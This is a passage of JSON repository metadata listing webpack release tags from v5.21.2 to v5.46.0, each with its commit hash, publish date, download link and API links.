:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"t